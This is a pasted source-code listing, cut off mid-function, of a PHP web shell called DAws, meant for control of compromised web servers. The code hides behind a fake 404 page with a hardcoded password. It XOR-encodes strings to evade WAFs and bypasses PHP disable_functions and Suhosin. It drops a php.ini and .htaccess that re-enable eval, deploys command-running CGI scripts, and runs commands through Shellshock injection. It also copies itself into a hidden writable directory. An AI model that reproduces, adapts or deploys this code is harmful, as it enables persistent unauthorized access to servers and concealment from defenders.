· 6 years ago · Mar 09, 2019, 02:58 PM
1<?php
2
3@session_start(); //with error supression because using session_start() multiple times was causing an error on IIS for some reason which makes no sense at all.
4
5//static 404 page
6//-->
7$static_fake_page = "
8<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
9<html><head>
10<title>404 Not Found</title>
11</head><body>
12<h1>Not Found</h1>
13<p>The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.</p>
14<hr>
15<address>".$_SERVER["SERVER_SOFTWARE"]." Server at ".$_SERVER['SERVER_ADDR']." Port 80</address>
16</body></html>"; //this will be used if DAws fails to show a dynamic fake 404 page
17
18/*
19if (!isset($_SESSION["logged_in"])) {
20 if (isset($_POST["pass"])) {
21 if(md5($_POST["pass"]) == "11b53263cc917f33062363cef21ae6c3") { //DAws
22 $_SESSION["logged_in"] = True;
23 } else {
24 session_destroy();
25 header("HTTP/1.1 404 Not Found");
26 echo $static_fake_page;
27 exit;
28 }
29 } else {
30 session_destroy();
31 header("HTTP/1.1 404 Not Found");
32 echo $static_fake_page;
33 exit();
34 }
35}*/
36//<--
37
38if (ob_get_level()) {
39 ob_end_clean(); //no point of having output buffering on yet
40}
41
42if (!isset($_SESSION['key'])) { //create our session key which will be used for encryption
43 $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
44 $characters_length = strlen($characters);
45 $random_string = "";
46 for ($i = 0; $i < 10; $i++) { //length = 10 (length doens't really matter that much though, check our xor functions to understand why)
47 $random_string .= $characters[rand(0, $characters_length - 1)];
48 }
49 $_SESSION['key'] = $random_string;
50}
51
52if (!isset($_SESSION['windows'])) {
53 if (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN') { //checking if we're running on a Window's machine
54 $_SESSION["windows"] = True;
55 $_SESSION["windows_drive"] = realpath("\\"); //saving the values instead of using realpath multiple times later on
56 } else {
57 $_SESSION["windows"] = False;
58 }
59}
60
61//base64 recoded to bypass disablers
62$base64ids = array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "+", "/");
63
64function bin_dec($string) {
65 $decimal = "";
66 for($i = 0; $i<strlen($string); $i++) {
67 $dec = intval($string{(strlen($string))-$i-1})*pow(2, $i);
68 $decimal+=$dec;
69 }
70
71 return intval($decimal);
72}
73
74function dec_bin($dec) {
75 $binary = "";
76 $current = intval($dec);
77
78 if ($current == 0) {
79 return "0";
80 }
81
82 while (1) {
83 if ($current == 1) {
84 $binary="1".$binary;
85 break;
86 }
87 $binary = ($current%2).$binary;
88 $current = intval($current/2);
89 }
90
91 return $binary;
92}
93
94function base64encoding($string) {
95 global $base64ids;
96
97 $binary = "";
98 for ($i = 0; $i<strlen($string); $i++) {
99 $charASCII = ord($string{$i});
100 $asciiBIN = dec_bin($charASCII);
101 if (strlen($asciiBIN) != 8) {
102 $asciiBIN = str_repeat("0", 8-strlen($asciiBIN)).$asciiBIN;
103 }
104 $binary.= $asciiBIN;
105 }
106
107 $array = array();
108 for ($j = 0; $j<strlen($binary); $j = $j + 6) {
109 $part = substr($binary, $j, 6);
110 array_push($array, $part);
111 }
112
113 if (strlen($array[count($array)-1]) != 6) {
114 $array[count($array)-1] = $array[count($array)-1].str_repeat("0", 6 - strlen($array[count($array)-1]));
115 }
116
117 $base64 = "";
118 foreach ($array as &$value) {
119 $value = bin_dec($value);
120 $value = $base64ids[$value];
121 $base64.=$value;
122 }
123
124 if ((strlen($base64) % 4) != 0) {
125 $base64.=str_repeat("=", 4-(strlen($base64) % 4));
126 }
127
128 return $base64;
129}
130
131function base64decoding($string) {
132 global $base64ids;
133
134 $string = str_replace("=", "", $string);
135
136 $binary = "";
137 for ($i = 0; $i < strlen($string); $i++) {
138 $charID = array_search($string{$i}, $base64ids);
139 $idBIN = dec_bin($charID);
140 if (strlen($idBIN) != 6) {
141 $idBIN = str_repeat("0", 6-strlen($idBIN)).$idBIN;
142 }
143 $binary.= $idBIN;
144 }
145
146 if (strlen($binary) %8 != 0) {
147 $binary = substr($binary, 0, strlen($binary)-(strlen($binary) %8));
148 }
149
150 $array = array();
151 for ($j = 0; $j<strlen($binary); $j = $j + 8) {
152 $part = substr($binary, $j, 8);
153 array_push($array, $part);
154 }
155
156 $text = "";
157 foreach ($array as &$value) {
158 $value = bin_dec($value);
159 $value = chr($value);
160 $text.=$value;
161 }
162
163 return $text;
164}
165
166function xor_this($string, $key=null) { //our 'random key' based xor encryption
167 if ($string == "") {
168 return $string;
169 }
170
171 if ($key == null) {
172 $key = $_SESSION['key'];
173 }
174
175 $outText = '';
176
177 for($i=0; $i<strlen($string);) {
178 for($j=0; ($j<strlen($key) && $i<strlen($string)); $j++,$i++) {
179 $outText .= $string{$i} ^ $key{$j};
180 }
181 }
182
183 return base64encoding($outText);
184} //so basically every string character gets xored once by one key character. That key character is chosen by order
185//example: string=dotcppfile key=1234
186//d will get xored by 1
187//o will get xored by 2
188//etc
189//the first p will get xored by 1 as well because we start all over when all the characters of our key gets used.
190//this gets the job done at its best when it comes to bypassing security systems like WAFs, etc...
191
192function unxor_this($string, $key=null) {
193 if ($string == "") {
194 return $string;
195 }
196
197 if ($key == null) {
198 $key = $_SESSION['key'];
199 }
200
201 return base64decoding(xor_this(base64decoding($string), $key));
202}
203
204//recursive glob used later on to find DAws's directory (first method)
205function recursive_glob($path) {
206 $paths = glob($path."/*", GLOB_ONLYDIR);
207 foreach ($paths as $path) {
208 if ((is_readable($path)) && (is_writable($path))) {
209 return $path;
210 } else if ((installed_php("fileowner")) && (installed_php("posix_getpwuid"))) {
211 //we can chmod a direcotry that we own and gift it to our beloved DAws!
212 $fileowner = posix_getpwuid(fileowner($path));
213 $fileowner = $fileowner["name"];
214 if($_SESSION["process_owner"] == $fileowner) { //we own that folder
215 if (chmod($path, 0777)) { //successfully chmoded
216 return $path;
217 }
218 }
219 }
220 }
221
222 foreach ($paths as $path) {
223 $path = recursive_glob($path);
224 if ($path != "") {
225 return $path;
226 }
227 }
228}
229
230//recursive iterator used later on to find DAws's directory (second method)
231function recursive_iterator($location) {
232 $iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(realpath($location)), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD);
233
234 $paths = array(realpath($location));
235 foreach ($iter as $path => $dir) {
236 if ($dir->isDir()) {
237 if ((is_readable($dir)) && (is_writable($dir))) {
238 return realpath($path);
239 } else if ((installed_php("fileowner")) && (installed_php("posix_getpwuid"))) {
240 //we can chmod a direcotry that we own and gift it to our beloved DAws!
241 $fileowner = posix_getpwuid(fileowner($dir));
242 $fileowner = $fileowner["name"];
243 if($_SESSION["process_owner"] == $fileowner) { //we own that folder
244 if (chmod($dir, 0777)) { //successfully chmoded
245 return realpath($path);
246 }
247 }
248 }
249 }
250 }
251}
252
253function get_php_ini($string) { //read from php.ini
254 $output = @ini_get($string);
255 if ($output == "") {
256 $output = @get_cfg_var($string);
257 }
258
259 return $output;
260}
261
262//check what's disabled by disable_functions and suhosin
263$disabled_php = array();
264$disabled_suhosin = array();
265
266foreach (explode("," , get_php_ini(unxor_this("AAYHAhIcAzYKEAoMAAofHhU=", "dotcppfile"))) as $disabled) { //disable_functions
267 array_push($disabled_php, $disabled);
268}
269foreach (explode(",", get_php_ini(unxor_this("AAYHAhIcAzYPCQUcBwYD", "dotcppfile"))) as $disabled) { //disabled_classes
270 array_push($disabled_php, $disabled);
271}
272foreach (explode("," , get_php_ini(unxor_this("FxocDAMZCEcJHQEMARcfAkgPGQsHQRYPERMNBQUWEA==", "dotcppfile"))) as $disabled) { //suhosin.executor.func.blacklist
273 array_push($disabled_suhosin, $disabled);
274}
275
276$disabled_php = array_filter($disabled_php);
277$disabled_suhosin = array_filter($disabled_suhosin);
278
279$disabled_php = array_map('trim', $disabled_php);
280$disabled_suhosin = array_map('trim', $disabled_suhosin);
281
282function disabled_php($function_name) { //checks if a function is disabled by php
283 foreach ($GLOBALS["disabled_php"] as $value) {
284 if ($function_name == $value) {
285 return True;
286 }
287 }
288
289 return False;
290}
291
292function disabled_suhosin($function_name) { //checks if a function is disabled by suhosin
293 foreach ($GLOBALS["disabled_suhosin"] as $value) {
294 if ($function_name == $value) {
295 return True;
296 }
297 }
298
299 return False;
300}
301
302function installed_php($function=null, $class=null) { //checks if a function/class exists
303 if ($function != null) {
304 if (disabled_php("function_exists") == False) {
305 if (disabled_suhosin("function_exists") == False) {
306 if (function_exists($function)) {
307 return True;
308 } else {
309 return False;
310 }
311 } else {
312 if (bypass_suhosin("function_exists", $function)) {
313 return True;
314 } else {
315 return False;
316 }
317 }
318 } else {
319 ob_start();
320 $test = $function();
321 $return_value = ob_get_contents();
322 ob_end_clean();
323
324 if ((strpos($return_value, "error") == False) && (strpos($return_value, "Warning") == False)) {
325 return True;
326 } else {
327 return False;
328 }
329 }
330 } else {
331 if (disabled_php("class_exists") == False) {
332 if (disabled_suhosin("class_exists") == False) {
333 if (class_exists($class)) {
334 return True;
335 } else {
336 return False;
337 }
338 } else
339 if (bypass_suhosin("class_exists", $class)) {
340 return True;
341 } else {
342 return False;
343 }
344 } else {
345 ob_start();
346 $test = new $class();
347 $return_value = ob_get_contents();
348 ob_end_clean();
349
350 if ((strpos($return_value, "error") == False) && (strpos($return_value, "Warning") == False)) {
351 return True;
352 } else {
353 return False;
354 }
355 }
356 }
357}
358
359//dynamic 404 page -->
360//Now the reason I don't like this much is because there's a lot of important code that needs to be ran first
361//to make sure that we can show a dynamic fake 404 page while bypassing security systems
362if (!isset($_SESSION["logged_in"])) {
363 $show_it = False;
364
365 if (isset($_POST["pass"])) {
366 if(md5($_POST["pass"]) == "11b53263cc917f33062363cef21ae6c3") { //DAws
367 $_SESSION["logged_in"] = True;
368 } else {
369 session_destroy();
370 @header("HTTP/1.1 404 Not Found");
371 $show_it = True;
372 }
373 } else {
374 session_destroy();
375 @header("HTTP/1.1 404 Not Found");
376 $show_it = True;
377 }
378
379 if ($show_it == True) {
380 $random_url = "";
381 if (isset($_SERVER['HTTPS'])) {
382 $random_url .= "https";
383 } else {
384 $random_url .= "http";
385 }
386
387 $random_string = time();
388 $random_url .= "://".$_SERVER['SERVER_NAME']."/".$random_string."/DAws.php"; //our random bitch
389 $output = @url_get_contents($random_url);
390
391 if ($output != "") {
392 echo str_replace("/".$random_string."/DAws.php", "/DAws.php", $output);
393 } else {
394 echo $static_fake_page;
395 }
396
397 exit();
398 }
399}//<--
400
401//finds current process's owner
402if (!isset($_SESSION["process_owner"])) {
403 if (installed_php("posix_geteuid")) { //Linux
404 $_SESSION["process_owner"] = posix_getpwuid(posix_geteuid());
405 $_SESSION["process_owner"] = $_SESSION["process_owner"]["name"];
406 } else { //Linux and Windows
407 $_SESSION["process_owner"] = getenv('USERNAME');
408 }
409}
410
411//finds DAws's directory; a writeable and readable directory, move to it and drop our php.ini and .htaccess files that will
412//make life easier if suphp is installed
413if (!isset($_SESSION["daws_directory"])) {
414 $daws_dir = getcwd();
415
416 if ($_SESSION["windows"] == True) {
417 $_SESSION["slash"] = "\\"; //we can use this later on
418 } else {
419 $_SESSION["slash"] = "/";
420 }
421
422 //finding the web dir which will be used here and when deploying the CGI Scripts
423 //not using DOCUMENT_ROOT anymore because it may need to be hardcoded and reset, and fuck all of that
424 $array = explode($_SESSION["slash"], getcwd());
425 for ($i = 0; $i<(count(explode("/", $_SERVER["SCRIPT_NAME"]))-2); $i++) {
426 array_pop($array);
427 }
428
429 $_SESSION["web_dir"] = implode($_SESSION["slash"], $array);
430
431 //finding DAws's directory
432 if ((is_writable($daws_dir)) && (is_readable($daws_dir))) {
433 $_SESSION["daws_directory"] = $daws_dir; //no need to look further since we are in it
434 } else { //lets dance
435 $locations = array($_SESSION["web_dir"], realpath($_SESSION["slash"])); //we go for a random directory if a proper web directory wasn't found
436
437 foreach ($locations as $location) {
438 //uses the recursive glob function for old php versions
439 if (disabled_php("glob") == False) {
440 $_SESSION["daws_directory"] = recursive_glob(realpath($location));
441 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (installed_php(null, "RecursiveIteratorIterator") == True)) { //Iterator incoming!
442 $_SESSION["daws_directory"] = recursive_iterator($location);
443 }
444
445 if ((isset($_SESSION["daws_directory"])) && ($_SESSION["daws_directory"] != "")) {
446 break;
447 }
448 }
449 }
450
451 if (basename($_SESSION["daws_directory"]) != "DAws") { //We just landed, time to get ready for battle because we got some mofos to kill!
452 $_SESSION["daws_directory"] .= "/DAws";
453 @mkdir($_SESSION["daws_directory"]); //incase it already existed. We'll simply replace the old files of DAws with the new ones.
454
455 if (strpos($_SESSION["daws_directory"], $_SESSION["web_dir"]) !== False) {
456 //we clear all disablers, allow eval and url opening
457 $php_ini = "AAYHAhIcAzYKEAoMAAofHhVJUW8ABgcCEhwDNg8JBRwHBgNQW2MfEAwABwoeXgMRCQYRGxsRXhYTBw9LBgMVABscDxoYRVlPVkF6AxMBAxYNAVoGCBUFHBgKFkEQCgMRBAUJOgEZFQ9QTUYmCgNuDhgPHwc5HB4JOwkbExUeRlRMKgo=";
458 //and here we link that php.ini to suphp as a config file
459 //http://support.hostgator.com/articles/specialized-help/technical/how-to-get-your-php-ini-path-with-suphp
460 $htaccess ="<IfModule mod_suphp.c>\nsuPHP_ConfigPath ".$_SESSION["daws_directory"].$_SESSION["slash"]."php.ini\n</IfModule>";
461
462 write_to_file($_SESSION["daws_directory"]."/php.ini", unxor_this($php_ini, "dotcppfile"));
463 write_to_file($_SESSION["daws_directory"]."/.htaccess", $htaccess);
464
465 //and now we move our DAws to its directory if it's not there already
466 if (getcwd() != $_SESSION["daws_directory"]) {
467 copy($_SERVER["SCRIPT_FILENAME"], $_SESSION["daws_directory"]."/DAws.php");
468 header("Location: http://".$_SERVER['SERVER_NAME'].str_replace($_SESSION["web_dir"], "", $_SESSION["daws_directory"]."/DAws.php"));
469 }
470 }
471 }
472}
473
474function write_to_file($location, $string) {
475 $output = file_put_contents_extended($location, $string); //file_put_contents
476 if ($output != False) {
477 return;
478 }
479
480 $fp = fopen_extended($location, "w"); //fopen
481 if ($fp != False) {
482 fwrite($fp, $string);
483 fclose($fp);
484 return;
485 }
486
487 execute_command("echo ".escapeshellarg($string)." > $location"); //system commands
488}
489
490function read_file($location) {
491 if (filesize($location) == 0) { //empty files will cause file_get_contents to return false and fread to cause an error
492 return "";
493 }
494
495 $content = file_get_contents_extended($location); //file_get_contents
496 if ($content == False) {
497 return htmlspecialchars($content);
498 }
499
500 $fp = fopen_extended($location, "r"); //fopen
501 if ($fp != False) {
502 $content = htmlspecialchars(fread($fp, filesize($location)));
503 fclose($fp);
504 return $content;
505 }
506
507 if ($_SESSION["windows"] == True) { //system commands
508 return htmlspecialchars(execute_command("type $location"));
509 } else {
510 return htmlspecialchars(execute_command("cat $location"));
511 }
512
513 return "DAws: failed to read the file because file_get_contents_extended, fopen_extended and system commands failed."; //fail
514}
515
516function url_get_contents($url, $user_agent=null) { //used to download the source of a webpage
517 if ((installed_php("curl_version") == True) && (disabled_php("curl_init") == False)) { //using curl
518 if (disabled_suhosin("curl_init") == False) {
519 $ch = curl_init(str_replace(" ","%20",$url));
520 } else {
521 $ch = bypass_suhosin("curl_init", str_replace(" ","%20",$url));
522 }
523
524 curl_setopt($ch, CURLOPT_URL, $url);
525 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
526
527 if ($user_agent != null) { //used by shellshock (method 2)
528 curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
529 }
530
531 $content = curl_exec($ch);
532 curl_close($ch);
533
534 return $content;
535 }
536
537 //for file_get_contents and fopen
538 if ($user_agent != null) {
539 $opts = array('http'=>array('header'=>"User-Agent: $user_agent\r\n"));
540 $context = stream_context_create($opts);
541 } else {
542 $context = null;
543 }
544
545 //using file_get_contents
546 $content = file_get_contents_extended($url, True, $context);
547 if ($content != False) {
548 return $content;
549 }
550
551 //using fopen
552 $fp = fopen_extended($url, "r", True, $context);
553 if ($fp != False) {
554 $content = fread($fp, filesize($url));
555 fclose($fp);
556 return $content;
557 }
558
559 //using system commands (no need to apply shellshock here since we're already using system commands...)
560 if ($_SESSION["windows"] == True) {
561 if (execute_command("bitsadmin", True) == True) { //bitsadmin is a nice choice here
562 return execute_command("bitsadmin.exe /Transfer DAwsDownloadJob $link $location > null; type $location");
563 } else if (strpos(execute_command("powershell.exe"), "Windows PowerShell")) { //powershell comes next
564 return execute_command("powershell.exe Invoke-WebRequest $link -OutFile $location > null; type $location");
565 } else {
566 return False; //sadly, nothing worked
567 }
568 } else { //curl or wget for Linux
569 if (execute_command("curl", True) == True) {
570 return execute_command("curl $url");
571 } else if (execute_command("wget", True) == True) {
572 return execute_command("wget -qO- $url");
573 } else {
574 return False;
575 }
576 }
577}
578
579if (!isset($_SESSION["cgi"])) { //setting up the cgi scripts
580 $cgi_htaccess = "bi4QBzgRCA0AABZPFwQZXRUKHgwUG1RNAxhGRw4EEGU7EwQZCQcfRU8qDAYTMyEgZg==";
581 $cgi_bash = "R05bARkeSQsNFgxlfgYTGAlJTiYLAQAGHgRLHRUVAVVUFxUIEkYEEQkDVmkVEw4GTEdGZX4AHx0LCAIBWQ8RABgfRktINDEqJjovIzI7JSsjTVQfUAMDDUxICk9TEF8uSEMPCgkCFQ0UTTpBNztCMl4/WV5MTUM5VUAERFAMRgsNFgFZQENdXQIMDwoAClQfUAMDDUxHF0BRUUBfRkYLR0QTVBAVFEZLH0pPQFRMF1IGYwkTBQNURxMfCwQNCwA=";
582 $cgi_bat = "JAoXCx9QCQ8Kb24KFwsfUCUGAhEBAQBOBAkWDFZFEAoMF18YEgQAbwEMHAxeemwACkUBFx0QBFACDA8KAApaFwgERg0JCUQLEQAfFANHGB0QZVwGExgJSUk0MSomOi8jMjslKyNVCltVWUZXTAAKDBsHFRRIHRQRbgwREQQFEgAARUkLEQAfFANJTgAKDBsHFRRIHRQRRk9WBxUTCQ0JSxAXAEF6AwMdQxVEDBkHTUwCDA8KAApaFwgEbEwPCABK";
583 $cgi_path = $_SESSION["daws_directory"]."/cgi";
584
585 if (isset($_SERVER['HTTPS'])) {
586 $protocol = "https";
587 } else {
588 $protocol = "http";
589 }
590
591 if (!file_exists($cgi_path)) {
592 mkdir($cgi_path);
593 }
594
595 //writing everything
596 write_to_file($cgi_path."/.htaccess", unxor_this($cgi_htaccess, "dotcppfile"));
597
598 if ($_SESSION["windows"] == True) {
599 write_to_file($cgi_path."/DAws.bat", unxor_this($cgi_bat, "dotcppfile"));
600 chmod($cgi_path."/DAws.bat", 0755);
601 $_SESSION["cgi_url"] = $protocol."://".$_SERVER['SERVER_NAME'].str_replace("\\", "/", str_replace(realpath($_SESSION["web_dir"]), "", $cgi_path))."/DAws.bat";
602 } else {
603 write_to_file($cgi_path."/DAws.sh", unxor_this($cgi_bash, "dotcppfile"));
604 chmod($cgi_path."/DAws.sh", 0755);
605 $_SESSION["cgi_url"] = $protocol."://".$_SERVER['SERVER_NAME'].str_replace($_SESSION["web_dir"], "", $cgi_path)."/DAws.sh";
606 }
607
608 //testing it
609 $test = url_get_contents($_SESSION["cgi_url"]."?command=".base64encoding("echo dotcppfile"));
610 if(($test != "") && (strpos($test, "Internal Server Error") === False) && (strpos($test, "QUERY_STRING") === False)) {
611 $_SESSION["cgi"] = True;
612 } else {
613 $_SESSION["cgi"] = False;
614 }
615}
616
617function execute_ssh($command) { //ssh
618 include_php($_SESSION["daws_directory"]."/SSH2.php"); //this should have been uploaded by the user himself
619
620 $ssh = new Net_SSH2('127.0.0.1', $_SESSION["ssh_port"]);
621
622 if ($ssh->login($_SESSION["ssh_user"], unserialize($_SESSION["ssh_rsa"]))) {
623 return $ssh->exec($command);
624 }
625}
626
627function shsh($command) { //shellshock (method 1)
628 $filename = $_SESSION["daws_directory"].time().".data";
629 putenv("PHP_LOL=() { x; }; $command > $filename 2>&1");
630 mail("a@127.0.0.1", "", "", "", "-bv");
631 if (file_exists($filename)) {
632 $content = read_file($filename);
633 unlink($filename);
634 } else {
635 $content = "";
636 }
637
638 return $content;
639} //this was written by Starfall and I know that this will simply fail if sendmail wasn't installed
640
641function shsh2($command) { //shellshock (method 2)
642 $filename = $_SESSION["daws_directory"].time().".data";
643 url_get_contents($_SESSION["shsh2_cgi_script"], "() { x; }; $command > $filename 2>&1"); //this will be updated later but lets keep it here for now
644
645 if (file_exists($filename)) {
646 $content = read_file($filename);
647 unlink($filename);
648 } else {
649 $content = "";
650 }
651
652 return $content;
653} //this will send http requests with a shellshock user agent to a cgi script
654
655if (!isset($_SESSION["shsh"])) { //testing shellshock1
656 if ($_SESSION["windows"] == False) { //more checks aren't necessary thanks to the upcoming test
657 if (shsh("echo Dyme and Starfall") == "Dyme and Starfall") {
658 $_SESSION["shsh"] = True;
659 } else {
660 $_SESSION["shsh"] = False;
661 }
662 } else {
663 $_SESSION["shsh"] = False;
664 }
665}
666
667if (!isset($_SESSION["shsh2"])) { //testing shellshock2
668 if ($_SESSION["windows"] == False) {
669 if (shsh("echo Dyme and Starfall") == "Dyme and Starfall") {
670 $_SESSION["shsh2"] = True;
671 } else {
672 $_SESSION["shsh2"] = False;
673 }
674 } else {
675 $_SESSION["shsh2"] = False;
676 }
677}
678
679//finds the location of ruby/perl/python for Windows
680if (!isset($_SESSION["pathes_found"])) {
681 if ($_SESSION["windows"] == True) { //windows...
682 if (execute_command($_SESSION["windows_drive"]."Python27:python", True)) {
683 $_SESSION["python"] = $_SESSION["windows_drive"]."Python27\\python.exe";
684 }
685
686 if (execute_command($_SESSION["windows_drive"]."Python34:python", True)) {
687 $_SESSION["python"] = $_SESSION["windows_drive"]."Python34\\python.exe";
688 }
689
690 if (execute_command($_SESSION["windows_drive"]."Perl32\\bin:perl", True)) {
691 $_SESSION["perl"] = $_SESSION["windows_drive"]."Perl32\\bin\\perl.exe";
692 }
693
694 if (execute_command($_SESSION["windows_drive"]."Perl64\\bin:perl", True)) {
695 $_SESSION["perl"] = $_SESSION["windows_drive"]."Perl64\\bin\\perl.exe";
696 }
697
698 if (execute_command($_SESSION["windows_drive"]."Ruby21-x32\\bin:ruby", True)) {
699 $_SESSION["ruby"] = $_SESSION["windows_drive"]."Ruby21-x32\\bin\\ruby.exe";
700 }
701
702 if (execute_command($_SESSION["windows_drive"]."Ruby21-x64\\bin:ruby", True)) {
703 $_SESSION["ruby"] = $_SESSION["windows_drive"]."Ruby21-x64\\bin\\ruby.exe";
704 }
705 } else { //DAMN YOU BILL! Lol, this is much easier
706 $softwares = array("perl", "python", "ruby", "php");
707
708 foreach ($softwares as $software) {
709 if (execute_command($software, True)) {
710 $_SESSION[$software] = $software;
711 }
712 }
713 }
714
715 $_SESSION["pathes_found"] = True;
716}
717
718function bypass_suhosin($function, $arg1=null, $arg2=null, $arg3=null, $arg4=null, $arg5=null, $output_needed = True) { //I found no other way to deal with arguments... poor me.
719 if ($arg5 != null) {
720 if (disabled_php("call_user_func") == False) {
721 $return_value = call_user_func($function, $arg1, $arg2, $arg3, $arg4, $arg5);
722 } else if (disabled_php("call_user_func_array") == False) {
723 $return_value = call_user_func_array($function, array($arg1, $arg2, $arg3, $arg4, $arg5));
724 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
725 $ref_function = new ReflectionFunction($function);
726 $handle = $ref_function->invoke($arg1, $arg2, $arg3, $arg4, $arg5);
727 if (is_string($handle)) {
728 $return_value = $handle;
729 } else {
730 $return_value = fread($handle, 4096);
731 pclose($handle);
732 }
733 } else if ($output_needed == False) {
734 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
735 $it = new ArrayIterator(array(""));
736 iterator_apply($it, $function, array($arg1, $arg2, $arg3, $arg4, $arg5));
737 } else if (disabled_php("register_tick_function") == False) {
738 declare(ticks=1);
739 register_tick_function($function, $arg1, $arg2, $arg3, $arg4, $arg5);
740 unregister_tick_function($function);
741 } else if (disabled_php("array_map") == False) {
742 array_map($function, array($arg1, $arg2, $arg3, $arg4, $arg5));
743 } else if (disabled_php("array_walk") == False) {
744 $x = array($arg1, $arg2, $arg3, $arg4, $arg5);
745 array_walk($x, $function);
746 } else if (disabled_php("array_filter") == False) {
747 array_filter(array($arg1, $arg2, $arg3, $arg4, $arg5), $function);
748 } else if (disabled_php("register_shutdown_function")) {
749 register_shutdown_function($function, $arg1, $arg2, $arg3, $arg4, $arg5);
750 }
751 }
752 } else if ($arg4 != null) {
753 if (disabled_php("call_user_func") == False) {
754 $return_value = call_user_func($function, $arg1, $arg2, $arg3, $arg4);
755 } else if (disabled_php("call_user_func_array") == False) {
756 $return_value = call_user_func_array($function, array($arg1, $arg2, $arg3, $arg4));
757 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
758 $ref_function = new ReflectionFunction($function);
759 $handle = $ref_function->invoke($arg1, $arg2, $arg3, $arg4);
760 if (is_string($handle)) {
761 $return_value = $handle;
762 } else {
763 $return_value = fread($handle, 4096);
764 pclose($handle);
765 }
766 } else if ($output_needed == False) {
767 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
768 $it = new ArrayIterator(array(""));
769 iterator_apply($it, $function, array($arg1, $arg2, $arg3, $arg4));
770 } else if (disabled_php("register_tick_function") == False) {
771 declare(ticks=1);
772 register_tick_function($function, $arg1, $arg2, $arg3, $arg4);
773 unregister_tick_function($function);
774 } else if (disabled_php("array_map") == False) {
775 array_map($function, array($arg1, $arg2, $arg3, $arg4));
776 } else if (disabled_php("array_walk") == False) {
777 $x = array($arg1, $arg2, $arg3, $arg4);
778 array_walk($x, $function);
779 } else if (disabled_php("array_filter") == False) {
780 array_filter(array($arg1, $arg2, $arg3, $arg4), $function);
781 } else if (disabled_php("register_shutdown_function")) {
782 register_shutdown_function($function, $arg1, $arg2, $arg3, $arg4);
783 }
784 }
785 } else if ($arg3 != null) {
786 if (disabled_php("call_user_func") == False) {
787 $return_value = call_user_func($function, $arg1, $arg2, $arg3);
788 } else if (disabled_php("call_user_func_array") == False) {
789 $return_value = call_user_func_array($function, array($arg1, $arg2, $arg3));
790 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
791 $ref_function = new ReflectionFunction($function);
792 $handle = $ref_function->invoke($arg1, $arg2, $arg3);
793 if (is_string($handle)) {
794 $return_value = $handle;
795 } else {
796 $return_value = fread($handle, 4096);
797 pclose($handle);
798 }
799 } else if ($output_needed == False) {
800 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
801 $it = new ArrayIterator(array(""));
802 iterator_apply($it, $function, array($arg1, $arg2, $arg3));
803 } else if (disabled_php("register_tick_function") == False) {
804 declare(ticks=1);
805 register_tick_function($function, $arg1, $arg2, $arg3);
806 unregister_tick_function($function);
807 } else if (disabled_php("array_map") == False) {
808 array_map($function, array($arg1, $arg2, $arg3));
809 } else if (disabled_php("array_walk") == False) {
810 $x = array($arg1, $arg2, $arg3);
811 array_walk($x, $function);
812 } else if (disabled_php("array_filter") == False) {
813 array_filter(array($arg1, $arg2, $arg3), $function);
814 } else if (disabled_php("register_shutdown_function")) {
815 register_shutdown_function($function, $arg1, $arg2, $arg3);
816 }
817 }
818 } else if ($arg2 != null) {
819 if (disabled_php("call_user_func") == False) {
820 $return_value = call_user_func($function, $arg1, $arg2);
821 } else if (disabled_php("call_user_func_array") == False) {
822 $return_value = call_user_func_array($function, array($arg1, $arg2));
823 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
824 $ref_function = new ReflectionFunction($function);
825 $handle = $ref_function->invoke($arg1, $arg2);
826 if (is_string($handle)) {
827 $return_value = $handle;
828 } else {
829 $return_value = fread($handle, 4096);
830 pclose($handle);
831 }
832 } else if ($output_needed == False) {
833 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
834 $it = new ArrayIterator(array(""));
835 iterator_apply($it, $function, array($arg1, $arg2));
836 } else if (disabled_php("register_tick_function") == False) {
837 declare(ticks=1);
838 register_tick_function($function, $arg1, $arg2);
839 unregister_tick_function($function);
840 } else if (disabled_php("array_map") == False) {
841 array_map($function, array($arg1, $arg2));
842 } else if (disabled_php("array_walk") == False) {
843 $x = array($arg1, $arg2);
844 array_walk($x, $function);
845 } else if (disabled_php("array_filter") == False) {
846 array_filter(array($arg1, $arg2), $function);
847 } else if (disabled_php("register_shutdown_function")) {
848 register_shutdown_function($function, $arg1, $arg2);
849 }
850 }
851 } else if ($arg1 != null) {
852 if (disabled_php("call_user_func") == False) {
853 $return_value = call_user_func($function, $arg1);
854 } else if (disabled_php("call_user_func_array") == False) {
855 $return_value = call_user_func_array($function, array($arg1));
856 } else if ((version_compare(PHP_VERSION, '5.0.0') >= 0) && (disabled_php(null, "ReflectionFunction") == False)) {
857 $ref_function = new ReflectionFunction($function);
858 $handle = $ref_function->invoke($arg1);
859 if (is_string($handle)) {
860 $return_value = $handle;
861 } else {
862 $return_value = fread($handle, 4096);
863 pclose($handle);
864 }
865 } else if ($output_needed == False) {
866 if ((version_compare(PHP_VERSION, '5.1.0') >= 0) && (disabled_php(null, "ArrayIterator") == False)) {
